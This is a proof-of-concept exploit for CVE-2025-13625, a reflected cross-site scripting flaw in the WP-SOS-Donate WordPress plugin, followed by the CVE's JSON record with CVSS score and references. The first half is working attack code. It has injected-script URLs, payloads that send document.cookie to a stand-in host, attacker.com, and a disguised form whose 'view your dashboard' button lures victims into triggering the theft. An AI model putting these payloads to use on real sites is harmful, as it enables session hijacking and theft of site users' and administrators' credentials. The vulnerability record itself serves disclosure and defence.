CVE-2025-13625

<!-- CVE-2025-13625 PoC - Reflected XSS in WP-SOS-Donate Plugin --> <!-- Target: WordPress site with WP-SOS-Donate plugin <= 0.9.2 --> <!-- Attack Vector: Malicious URL via PHP_SELF injection --> <!-- Example malicious URL --> <!-- https://victim-site.com/wp-admin/admin.php/\"><script>alert(document.cookie)</script> --> <!-- More sophisticated payload for cookie stealing --> <!-- https://victim-site.com/wp-admin/admin.php/\"><script>fetch('https://attacker.com/steal?c='+document.cookie)</script> --> <!-- HTML form for social engineering attack --> <form action="https://victim-site.com/wp-admin/admin.php" method="GET"> <input type="hidden" name="/\"><script>fetch('https://attacker.com/log?cookie='+btoa(document.cookie))</script>" value="x"> <button type="submit">Click to view your dashboard</button> </form> <!-- Automated PoC using JavaScript --> <script> // Generate malicious URL var baseUrl = window.location.origin + '/wp-admin/admin.php'; var xssPayload = '<script>fetch("https://attacker.com/steal?c="+btoa(document.cookie))</script>'; var maliciousUrl = baseUrl + '"' + xssPayload; // Log for testing console.log('Malicious URL:', maliciousUrl); </script>

{"cve": {"id": "CVE-2025-13625", "sourceIdentifier": "[email protected]", "published": "2025-12-05T06:16:08.563", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP-SOS-Donate Donation Sidebar Plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` parameter in all versions up to, and including, 0.9.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-sos-donate/tags/0.9.2/wp-sos-donate_options.php#L45", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-sos-donate/trunk/wp-sos-donate_options.php#L45", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/wp-sos-donate/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5123c672-e769-4d44-9912-e159d3e186c1?source=cve", "source": "[email protected]"}]}}